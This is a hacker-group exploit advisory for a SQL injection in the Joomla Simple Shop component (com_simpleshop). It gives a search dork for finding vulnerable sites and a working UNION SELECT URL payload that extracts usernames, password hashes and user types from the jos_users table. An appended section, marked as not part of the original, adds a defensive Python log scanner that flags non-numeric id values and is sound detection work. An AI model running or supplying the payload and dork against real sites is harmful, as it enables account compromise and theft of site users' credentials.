==============================================================
Joomla Component (com_simpleshop) SQL Injection Vulnerability
==============================================================

###########################
Title  : Joomla Component (com_simpleshop) SQL Injection Vulnerability
Script : Joomla Galore Simple Shop
Date   : 07/26/2010
Author : UnD3rGr0unD W4rri0rZ
Vendor : http://galore.co.za/
Dork   : inurl:"option=com_simpleshop" & inurl:"viewprod"
###########################

[ Vulnerable File ]

[path]/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=[SQL]

[SQL]: id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--

Xpl

index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--

##############################################################
#==================================================
#{~} I am HeaDShoT(tunisian muslim hacker) From UnD3rGr0unD W4rri0rZ {~}
#
#cont@ct:
#pwz@hotmail.Fr
#
#{~} there is always one who intelligent more than you do you should be optimistic {~}
#==================================================
#all greetZ to allah
#&
# my friends
# M4MIM4N // L363ND //Meher Assel // Ghost_tn //ta3lab el maker // Th3 m3t4l-m4n
#
##############################################################
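
Added example (not part of the original advisory): a defender-side log check for the injection point described above. It flags com_simpleshop viewprod requests whose id parameter is not a plain integer; the access-log format, the sample lines and the function name are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (common log format, documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [26/Jul/2010:10:00:01 +0000] "GET /index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=14 HTTP/1.1" 200 5120
198.51.100.7 - - [26/Jul/2010:10:00:09 +0000] "GET /index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9+UNION+SELECT+1,2,3+from+jos_users-- HTTP/1.1" 200 7340
203.0.113.5 - - [26/Jul/2010:10:01:30 +0000] "GET /index.php?option=com_content&task=view&id=abc HTTP/1.1" 200 2210
203.0.113.5 - - [26/Jul/2010:10:01:42 +0000] "GET /index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=7%27 HTTP/1.1" 500 310
"""

# Client address, then the request target between the method and the protocol.
# The target group is lazy and allows spaces, since some servers log them unencoded.
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (.+?) HTTP/[\d.]+"')
NUMERIC_ID = re.compile(r"\d+")


def suspicious_simpleshop_requests(log_text):
    """Return (client, decoded_id) for viewprod requests whose id is not an integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target = m.groups()
        # Split on the first '?' by hand so a raw '#' in the value is not lost.
        query = target.partition("?")[2]
        params = parse_qs(query, keep_blank_values=True)  # decodes %XX and '+'
        if "com_simpleshop" not in params.get("option", []):
            continue
        if "viewprod" not in params.get("task", []):
            continue
        # Check every occurrence of id, in case the parameter is repeated.
        for value in params.get("id", []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_simpleshop_requests(SAMPLE_LOG):
        print(f"{client}\tnon-numeric id: {value!r}")
```

The same allow-list rule (id must match digits only) is what the component's input handling needs before the value reaches a query; matching on it in logs avoids chasing individual payload keywords.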